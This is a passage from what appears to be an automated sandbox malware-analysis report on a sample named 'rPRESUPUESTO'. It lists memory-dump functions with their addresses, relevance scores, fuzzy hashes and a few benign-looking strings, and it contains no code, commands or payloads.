                                                • Instruction Fuzzy Hash: C2825B75E0021D8FEB25CFA9C980BEDFBB5BF48310F1481A9E959AB395D7309981CB50
                                                Function 01856420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 46b36055f677547c1a898fe9f45cb42c0d81f0766164552a5b1ae7db66e6500c
                                                • Instruction ID: fe1976b26e595833fbe772eafa619b60f13a76e6f1edf79a270ddc9500c951a8
                                                • Opcode Fuzzy Hash: 46b36055f677547c1a898fe9f45cb42c0d81f0766164552a5b1ae7db66e6500c
                                                • Instruction Fuzzy Hash: 8A917372940219AFEB21DB95CC85FAEBBB8EF18754F600055F700EB295E674AE00CB60
                                                Function 0187E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 957986af8a9bcdf78a2f35536372b33a5474b2b185f23f1b095b1a83ec262189
                                                • Instruction ID: 4b912e8661e60db5fce23328fc8ef52db0b81cb73bc5b4d97c6e20535ae1e597
                                                • Opcode Fuzzy Hash: 957986af8a9bcdf78a2f35536372b33a5474b2b185f23f1b095b1a83ec262189
                                                • Instruction Fuzzy Hash: 7891A072900609BEDB22AFA9DC84FAFBBB9EF45744F100069F505E7251EB34DA01CB91
                                                Function 0180A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: 302543a3e277a53e6a5f9eb18125658180fb6f2035a053ed0eabaaff085bafff
                                                • Instruction ID: a5a5f1e1fb7319ddef91e9a80966de523ec1a396ed1724b22910c12a9b717455
                                                • Opcode Fuzzy Hash: 302543a3e277a53e6a5f9eb18125658180fb6f2035a053ed0eabaaff085bafff
                                                • Instruction Fuzzy Hash: 71716BB5E0020E8FEF28CF9CC9906ADBBB1BF59714F24812AE505E7241EB318A41CB50
                                                Function 01874978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .mui
                                                • API String ID: 0-1199573805
                                                • Opcode ID: 174a770b20aa18d7260c6b950528379c41360755463430703efbb9045f851528
                                                • Instruction ID: acf943690a9f1b33d3e680a35fc07ad377f3dce6abbb1f4c96979ff44a835ddc
                                                • Opcode Fuzzy Hash: 174a770b20aa18d7260c6b950528379c41360755463430703efbb9045f851528
                                                • Instruction Fuzzy Hash: D8518472D0022A9BDB11EF99D844AAEFBB4AF18B14F054169E912FB250D774DE01CBE4
                                                Function 017EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                • Opcode ID: 86636defff9c950b515a103a208858f8c06973d26d73be753dbd382925247328
                                                • Instruction ID: 2789e94426bc37d7fc437fe6d1cac619bb15acb33d4b51bc4e8b7a554bad17a0
                                                • Opcode Fuzzy Hash: 86636defff9c950b515a103a208858f8c06973d26d73be753dbd382925247328
                                                • Instruction Fuzzy Hash: 364191725483129BD710DA79D848B6BFBE8AF8C714F440E6DF684D7280EA74DA04C797
                                                Function 0184C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 8e587b65f5ca8b81161858b00a6480e1b63ca7b63f9247bc04c2b59cbb114e4a
                                                • Instruction ID: ad30b7e1fa78be232b1e453a0b923eed95a94964ebcb10710e6761f7f81ef199
                                                • Opcode Fuzzy Hash: 8e587b65f5ca8b81161858b00a6480e1b63ca7b63f9247bc04c2b59cbb114e4a
                                                • Instruction Fuzzy Hash: 534154B2D0112DABDB21DA54CC84FDEB77DAB44714F0045A5EB08EB141DB709F898FA5
                                                Function 01866B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: b752d7cda5f6ef76f848401d3b50d72da29a19f3b588beabf9cc223914c8c687
                                                • Instruction ID: 99aba85182f37b05e8dfad162e6f179fb25be84674f095ee1cda8e3cee7d0be0
                                                • Opcode Fuzzy Hash: b752d7cda5f6ef76f848401d3b50d72da29a19f3b588beabf9cc223914c8c687
                                                • Instruction Fuzzy Hash: 91312C31A00B899BDB22CB6DC854BAE7BACDF54704F244028E941EB286E775DA05CB50
                                                Function 0185892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                Strings
                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0185895E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                • API String ID: 0-702105204
                                                • Opcode ID: 0946887d35e2285565052d689c1ce29725843981864aeeca01b404783d89c6af
                                                • Instruction ID: a9e2d4175cff0da6f66ba1ba5838d05fa8c27a13f4d37a8ba2911457251098af
                                                • Opcode Fuzzy Hash: 0946887d35e2285565052d689c1ce29725843981864aeeca01b404783d89c6af
                                                • Instruction Fuzzy Hash: 6401F7313002159FEB615A5BCCC8A66BFB6EFC6754B04001EFA4296151CB30AA41CB92
                                                Function 01872000 Relevance: .8, Instructions: 757COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cbe3cba486dbb3a58240f7149d8e837a97bd697076a9a0c93b880938eef4e978
                                                • Instruction ID: 44838b425544c497f099bd9a67c94f28a73bbdfcd5ebf9d38e25e87cc6e782ca
                                                • Opcode Fuzzy Hash: cbe3cba486dbb3a58240f7149d8e837a97bd697076a9a0c93b880938eef4e978
                                                • Instruction Fuzzy Hash: 1F42D1326083419BE725CF68C890A6BFBE6FF88344F08092DFA96D7250D771DA45CB52
                                                Function 01868158 Relevance: .6, Instructions: 617COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d5a4fe1101f77c72211bf34ea0100645723c3d95091aceae63387458a9aaf94
                                                • Instruction ID: a22478e1edda26c3f3bcf9a641b5309ad4b88e1f7e9c0314b223be18aa35cc4d
                                                • Opcode Fuzzy Hash: 7d5a4fe1101f77c72211bf34ea0100645723c3d95091aceae63387458a9aaf94
                                                • Instruction Fuzzy Hash: 94423B75A003198FEB25CF69C881BADBBF9BF49304F148199E94DEB242D7349A85CF50
                                                Function 017E2840 Relevance: .6, Instructions: 605COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1babdcd1e72be32297e569930488ffea665999489f4d77429c770aee4975a4b6
                                                • Instruction ID: 18c426a66275e213be5d2db32d8bf7d3dc5e89f1a12c18d7df3083c68f190725
                                                • Opcode Fuzzy Hash: 1babdcd1e72be32297e569930488ffea665999489f4d77429c770aee4975a4b6
                                                • Instruction Fuzzy Hash: AF32AE70A00759ABDB25CF6DC8547BABBF2BF88304F28411DD586DB285E735AB41CB90
                                                Function 0187A118 Relevance: .6, Instructions: 591COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86b6bd37c2718a901fdb4d67d2e85859e9a8434d5eb19af50edf3ae1b4f0f716
                                                • Instruction ID: 788ef849efa1dc6a4509162cb7c11612ba55e2c53580c1b2debe44df2a1a0650
                                                • Opcode Fuzzy Hash: 86b6bd37c2718a901fdb4d67d2e85859e9a8434d5eb19af50edf3ae1b4f0f716
                                                • Instruction Fuzzy Hash: FD22D1742046658BEB2DCF2DC09437ABBF1AF44344F0C8499E996CF286E335D692DB61
                                                Function 017D6A50 Relevance: .5, Instructions: 548COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66652aca6e9bb018d99372a1a7505eee91bec1e6d0095299a0072cea8e697e68
                                                • Instruction ID: e6729b6dff4ee0e91c3797236e0237a8929d18e97cb142ef03daab9ca2bb63e8
                                                • Opcode Fuzzy Hash: 66652aca6e9bb018d99372a1a7505eee91bec1e6d0095299a0072cea8e697e68
                                                • Instruction Fuzzy Hash: 87327C71A04209CFDB25CF68C484AAAFBF2FF88310F2445A9E956EB351D774E941CB91
                                                Function 017F4A35 Relevance: .4, Instructions: 423COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction ID: 1b6c63ce8975351423e54f0968f8452a1d27abcb1bb7d6c38435fd159db905be
                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction Fuzzy Hash: 59F14B71E0021A9BDB15CFA9C584BAFFBB5AF48710F08816DEA06EB345E734D941CB90
                                                Function 0186892B Relevance: .4, Instructions: 386COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6fab0867f2881f27b979e36ee0f55a8b235aa4b4f7faeb61eb2038d8de5e147
                                                • Instruction ID: fc4f33bcf9c6e68d282df1f6170dcd0773480753a8866096790eaf8f60472328
                                                • Opcode Fuzzy Hash: e6fab0867f2881f27b979e36ee0f55a8b235aa4b4f7faeb61eb2038d8de5e147
                                                • Instruction Fuzzy Hash: 2AD1E171A0070A8FDF15CF69C841AFEB7FAAF89304F188169D959E7241E735EA05CB60
                                                Function 017D65D0 Relevance: .4, Instructions: 383COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e78b4f50c89325a6141449f36c18ef21d3665fa43d05bda927c8e5f3bdcf11de
                                                • Instruction ID: 3e8a48bf1b088b02c3551d390db5ba8993d075bc8c19f56a2cff65ae5b38d777
                                                • Opcode Fuzzy Hash: e78b4f50c89325a6141449f36c18ef21d3665fa43d05bda927c8e5f3bdcf11de
                                                • Instruction Fuzzy Hash: 92E17A716083468FC715CF28C494A6AFBF0BF89314F15896DF99987351EB31E905CB92
                                                Function 017C8397 Relevance: .4, Instructions: 380COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6edcca7d3bd33a3011686512c3b89bee270e7541db3ff95aed68c546431b5700
                                                • Instruction ID: 64401e788b030b9da4a3f2a760aa8fc9256785dcb312b704a0ae0e523d7b738c
                                                • Opcode Fuzzy Hash: 6edcca7d3bd33a3011686512c3b89bee270e7541db3ff95aed68c546431b5700
                                                • Instruction Fuzzy Hash: 64D1F271A0021A9BDB25CF68C880ABBF7F5FF54B04F04466DE916DB285EB34EA50CB51
                                                Function 01858243 Relevance: .3, Instructions: 322COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction ID: de6052908631eea0141d246928ef0687fd0fb4cf2de8feae7396142fbb2a9a61
                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction Fuzzy Hash: ECB1A374A006099FDB64DF9AC940EABBFB9FF85344F10445EAE42D7791DA70EA06CB10
                                                Function 017E0535 Relevance: .3, Instructions: 300COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                • Instruction ID: 09f57b9a789d2587b36d9fb9471f040cd227f085f64cbf4be7f7cf2de1f120c9
                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                • Instruction Fuzzy Hash: 45B1F6317006469FDB15DB68C858BBEFBF6AF88300F284599E652D7285D770EE41CB90
                                                Function 017D83C0 Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36da6d339d4e427fdff6d0cc1ef1fc2143b3e18b953597a3cb9502ce78f00876
                                                • Instruction ID: 18365b1ebacd7e5dd220bc918e135984e7cc4d05faf0959af248093ec1291f3a
                                                • Opcode Fuzzy Hash: 36da6d339d4e427fdff6d0cc1ef1fc2143b3e18b953597a3cb9502ce78f00876
                                                • Instruction Fuzzy Hash: 82C167702083458FE764CF19C484BAAFBF4BF88704F54496DE98987291D774EA09CFA2
                                                Function 017CC427 Relevance: .3, Instructions: 280COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e14083a4fb5b7d13dad46c1656da26fd2f13244966bf91f2c064d552c40f7b0a
                                                • Instruction ID: 86087506c86a622330d0c9febecc5f106f7a1bb021d4fc7dc52a0895c8b5b086
                                                • Opcode Fuzzy Hash: e14083a4fb5b7d13dad46c1656da26fd2f13244966bf91f2c064d552c40f7b0a
                                                • Instruction Fuzzy Hash: 4CB17F70A002668BDB25CF68D980BA9F3B5EF54700F2485EDD50EE7285EB349EC5CB21
                                                Function 017FE5E7 Relevance: .3, Instructions: 278COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf86a121d994855ae247617a135414f15eea5dfa5dd7ebd0c0b4975c78b2f34e
                                                • Instruction ID: 97a2290bad565616285fd6678599801bb5b8225cba0f17710fb8972e717bae67
                                                • Opcode Fuzzy Hash: bf86a121d994855ae247617a135414f15eea5dfa5dd7ebd0c0b4975c78b2f34e
                                                • Instruction Fuzzy Hash: F8A11831E006599FEB21DB5CC844BAEBBB4AB40714F090165EB10EB3A1DB749E41CBD2
                                                Function 01810185 Relevance: .3, Instructions: 276COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b5129d4fca98a2ed4cf939b30bde5d6a812561fef275836283330765f94286a9
                                                • Instruction ID: 40a9243046416f222c097272e7cb77c7c18f3663288482f88b3cc5525b54d707
                                                • Opcode Fuzzy Hash: b5129d4fca98a2ed4cf939b30bde5d6a812561fef275836283330765f94286a9
                                                • Instruction Fuzzy Hash: C2A1D372B0061A9FDB25CF69C9D0BAAB7B9FF54318F104029FA45D7285DB34EA41CB50
                                                Function 018A4500 Relevance: .3, Instructions: 275COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eaeb634986763bc1b0e4cdf092d7ca11eee63cfd97dedf64860175162e3085d0
                                                • Instruction ID: ce84cf324f8d555102192e0b73578581b4cd8c179583c5d48603678328529fb3
                                                • Opcode Fuzzy Hash: eaeb634986763bc1b0e4cdf092d7ca11eee63cfd97dedf64860175162e3085d0
                                                • Instruction Fuzzy Hash: 2DA1EF72A00242DFEB21DF18C984B2ABBE9FF58704F990528F585DB651D3B4EE00CB91
                                                Function 018A2B57 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                • Instruction ID: b6ebcf763efb3c72d32ca3cfbab3b0252f41903e3b1e8adc8694c9bfacc639c3
                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                • Instruction Fuzzy Hash: DFB15A71E0061ADFEF25CFA9C880AADB7B6FF48314F548129E914E7355D730AA51CB90
                                                Function 018560E0 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4d473efb40651fe549d3e3b73c15c42182171298fbaec207a3e0b31ef2f5f9c
                                                • Instruction ID: cd12a194a9f9226c4bf0d312e1c6c7fc9cd457d32586e72e0e702e8c6a573745
                                                • Opcode Fuzzy Hash: d4d473efb40651fe549d3e3b73c15c42182171298fbaec207a3e0b31ef2f5f9c
                                                • Instruction Fuzzy Hash: D5919471D0021AAFDF55CF68D884BBEBBB5EB48750F654159EA10EB341E734DA009BA0
                                                Function 017EE3F0 Relevance: .3, Instructions: 261COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c15c8e83720f5dbf422feb7b1407cb6436200bf5869771a7af0f0e012e87e4b4
                                                • Instruction ID: a7e407f526d666384c5835ab27ff49610f6cbd2c098acdda0b1b6279ffab02db
                                                • Opcode Fuzzy Hash: c15c8e83720f5dbf422feb7b1407cb6436200bf5869771a7af0f0e012e87e4b4
                                                • Instruction Fuzzy Hash: 8E913531A00216CBEB24DB18C888B7AFBE1EF89714F2944A9ED05DB345FA74DA41C791
                                                Function 01826ACC Relevance: .2, Instructions: 226COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b65fb5007be16ff03545c9e482012b84f9608858798499b9ba20128251d746e
                                                • Instruction ID: 11b52798193e29948634bca4696d4f48afe249948be6df99780d11b63f4c07c1
                                                • Opcode Fuzzy Hash: 9b65fb5007be16ff03545c9e482012b84f9608858798499b9ba20128251d746e
                                                • Instruction Fuzzy Hash: 678194B1E006299FDB19DF69C940ABEBBF9FB48700F14852EE855D7640E334DA80CB94
                                                Function 0189AB40 Relevance: .2, Instructions: 222COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                • Instruction ID: f37dab843d5609bf2e0dac9940d0d752c9ef1b7a5705ad005542342f6d97cf24
                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                • Instruction Fuzzy Hash: D6817071A0025A9FDF19CF9DC880AAEBBF2BF84314F188569D916DB384D734EA41CB50
                                                Function 0180E284 Relevance: .2, Instructions: 212COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e3d691b349f0dbb02c636e623cea4bf96b567319a6b0657c3e9758b03e25e58
                                                • Instruction ID: 620e856ec0294b9832d402eb1925ac8924f253b6d05db72915451dc5aaff4ac0
                                                • Opcode Fuzzy Hash: 3e3d691b349f0dbb02c636e623cea4bf96b567319a6b0657c3e9758b03e25e58
                                                • Instruction Fuzzy Hash: 60814E7190060DAFDB66CFA9C880AEBBBFAFF48354F114829E555E7250DB30AE45CB50
                                                Function 017EC640 Relevance: .2, Instructions: 206COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31723899490cb4c2f84a26e19ba489648851c47e83b4b460a8367bbea5ab5aea
                                                • Instruction ID: eeef00a619eb9bb89d672f3fa716ddd9cdae977b5832abca946f8fd289124bed
                                                • Opcode Fuzzy Hash: 31723899490cb4c2f84a26e19ba489648851c47e83b4b460a8367bbea5ab5aea
                                                • Instruction Fuzzy Hash: 2771BFB99046659FCB268F59D5947FEFBF0FF89710F18425AE942AB350D3349A00CBA0
                                                Function 018847A0 Relevance: .2, Instructions: 202COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52c4467fec5272a0f6246730e97c0e970237a8302e2c02bfce6dd77c873663aa
                                                • Instruction ID: 175581f59f3242c82c9959b17a5a2304c0ef6bfcffb2c7cb1f6765918d81c3ff
                                                • Opcode Fuzzy Hash: 52c4467fec5272a0f6246730e97c0e970237a8302e2c02bfce6dd77c873663aa
                                                • Instruction Fuzzy Hash: 00716072900206EFDB20EF99D944A9AFBF9EF94700B25416AE710DB359E7328B44CF54
                                                Function 017E260B Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
